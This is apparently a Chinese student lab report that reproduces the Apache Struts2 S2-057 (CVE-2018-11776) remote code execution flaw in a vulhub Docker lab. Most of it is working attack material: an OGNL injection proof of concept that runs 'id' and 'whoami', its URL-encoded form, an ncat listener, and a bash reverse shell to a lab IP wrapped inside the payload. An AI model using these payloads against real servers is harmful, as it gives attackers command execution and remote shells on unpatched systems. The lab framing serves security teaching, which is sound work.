中间件安全原理与实践2

用户3348676772427
141 阅读1分钟

中间件安全原理与实践2

1/问答题

0.已配置docker环境。

\1. 使用 vulhub 项目中的docker-compose 搭建Struts2 S2-057 Remote Code Execution Vulnerablity (CVE-2018-11776) 的漏洞复现环境

(1)docker部署:

┌──(root💀pinginglab)-[/home/…/Test/vulhub-master/struts2/s2-057] └─# docker-compose up -d

image-20220630193236637

(2)访问http://172.16.35.136:8080/struts2-showcase

image-20220630193358271

\2. 对漏洞进行复现

(1)构造payload访问

/struts2-showcase/$%7B233*233%7D/actionChain1.action

image-20220630193709431

image-20220630193739456

(2)构造poc

${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('id')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码后的poc:

/struts2-showcase/$%7B%0A%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23ct%3D%23request%5B%27struts.valueStack%27%5D.context%29.%28%23cr%3D%23ct%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ou%3D%23cr.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ou.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ou.getExcludedClasses%28%29.clear%28%29%29.%28%23ct.setMemberAccess%28%23dm%29%29.%28%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27whoami%27%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23a.getInputStream%28%29%29%29%7D/actionChain1.action

image-20220630194049722

通过whoami命令拿到了 获取到当前用户名称,说明该漏洞可以利用

\3. 使用 nc反弹 shell

(1)ncat命令监听5555端口

┌──(root💀pinginglab)-[/home/…/Test/vulhub-master/struts2/s2-057] └─# ncat -lvvp 5555
Ncat: Version 7.92 ( nmap.org/ncat ) Ncat: Listening on :::5555 Ncat: Listening on 0.0.0.0:5555

(2)构造监听命令

bash -i >& /dev/tcp/172.16.35.136/5555 0>&1

${ (#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#ct=#request['struts.valueStack'].context).(#cr=#ct['com.opensymphony.xwork2.ActionContext.container']).(#ou=#cr.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ou.getExcludedPackageNames().clear()).(#ou.getExcludedClasses().clear()).(#ct.setMemberAccess(#dm)).(#a=@java.lang.Runtime@getRuntime().exec('bash -i >& /dev/tcp/172.16.35.136/5555 0>&1')).(@org.apache.commons.io.IOUtils@toString(#a.getInputStream()))}

url编码:

image-20220630194937849

利用hackbar编码:

image-20220630195529413

\4. 详细记录实验过程并配上截图

\5. 使用其他 struts2 漏洞也可

编写实验报告时,将整个作业过程中的涉及的步骤、效果、思路等整理为Word或PDF或PPT⽂档并上传,⽂档名称为"姓名-作业名称"。

avatar
文章
阅读
粉丝